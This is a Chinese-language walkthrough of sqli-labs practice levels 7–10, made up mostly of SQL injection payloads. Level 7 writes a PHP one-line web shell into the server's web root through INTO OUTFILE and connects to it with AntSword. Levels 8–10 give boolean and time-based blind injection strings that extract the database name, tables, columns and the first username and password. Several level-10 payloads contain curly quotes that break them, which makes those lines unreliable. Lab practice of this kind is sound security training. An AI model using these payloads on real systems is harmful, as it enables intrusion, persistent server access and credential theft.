sqli-labs靶场笔记（三）

sqli-labs靶场笔记（三）

Less-07【木马上传|’))注入】

下面展示 payload。

id=1')) order by 3--+	//显示属性为3列
id=-1')) union select 1,2,'<?php @eval($_POST["code"]);?>' into outfile 'C:\\software\\phpstudy_pro\\WWW\\love.php'--+	//将一句话木马写入

用蚁剑连接love.php即可通关

Less-08【Boolean注入|'注入】

下面展示 payload。

id=1' and 1=1 --+	//确定存在sql注入
id=1' order by 3 --+	//确定属性列为3
id=1' and ascii(substr((select database()),1,1))=115 --+

参考之前的Boolean注入

Less-09【时间盲注|'注入】

下面展示 payload。

id=1' and sleep(5) --+	//判断存在注入
id=1' and if(ascii(substr((select database()),1,1))=115,sleep(5),1) --+	//猜测数据库名
id=1' and if(exists(select * from information_schema.columns),sleep(5),1) --+	//查看是否存在
id=1' and if(ascii(substr((select table_name from information_schema.columns where table_schema='security' limit 0,1),1,1))=101,sleep(5),1) --+	//查看数据库表
id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=66,sleep(5),1) --+	//查看属性列
id=1' and if(ascii(substr((select username from security.users limit 0,1),1,1))=66,sleep(5),1) --+	//查看数据

判断是否存在注入点

时间为5秒多，存在注入

猜测数据库名

确定数据库长度为8

此处使用Burp猜测，可快速猜测

确定数据库名为security

查看表名、属性列

存在information_schema.columns表

查看第一个表为emails

查看第三个表为referers
剩下略

得到第一个属性列为id

得到第二个属性为username
剩下略

查看数据

得到第一个账户名为Dumb

得到第一个账户密码为Dumb

Less-10【时间盲注|"注入】

下面展示 payload。

id=1" and sleep(5) --+	//判断注入点
id=1" and if(ascii(substr((select database()),1,1))=115,sleep(5),1) --+	//查看数据库名
id=1“ and if(exists(select * from information_schema.columns),sleep(5),1) --+	//查看是否存在
id=1” and if(ascii(substr((select table_name from information_schema.columns where table_schema='security' limit 0,1),1,1))=101,sleep(5),1) --+	//查看数据库表
id=1“ and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=66,sleep(5),1) --+	//查看属性列
id=1” and if(ascii(substr((select username from security.users limit 0,1),1,1))=66,sleep(5),1) --+	//查看数据

详情参考Less-09